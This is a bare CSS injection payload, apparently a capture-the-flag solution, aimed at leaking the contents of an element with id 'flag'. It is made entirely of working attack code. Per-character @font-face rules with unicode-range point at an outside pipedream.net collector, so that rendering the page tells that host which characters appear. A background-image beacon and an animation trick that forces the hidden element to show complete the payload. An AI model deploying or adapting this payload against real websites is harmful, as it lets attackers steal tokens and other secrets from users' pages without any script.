body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W43')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w43,p98w43,p106w43,p112w43,p115w43,p121w43,p122w43,p48w43,p49w43,p52w43,p53w43,p55w43,p125w43,monospace;width:43ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W43');unicode-range:U+0061}
@font-face{font-family:p98w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W43');unicode-range:U+0062}
@font-face{font-family:p106w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W43');unicode-range:U+006A}
@font-face{font-family:p112w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W43');unicode-range:U+0070}
@font-face{font-family:p115w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W43');unicode-range:U+0073}
@font-face{font-family:p121w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W43');unicode-range:U+0079}
@font-face{font-family:p122w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W43');unicode-range:U+007A}
@font-face{font-family:p48w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W43');unicode-range:U+0030}
@font-face{font-family:p49w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W43');unicode-range:U+0031}
@font-face{font-family:p52w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W43');unicode-range:U+0034}
@font-face{font-family:p53w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W43');unicode-range:U+0035}
@font-face{font-family:p55w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W43');unicode-range:U+0037}
@font-face{font-family:p125w43;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W43');unicode-range:U+007D}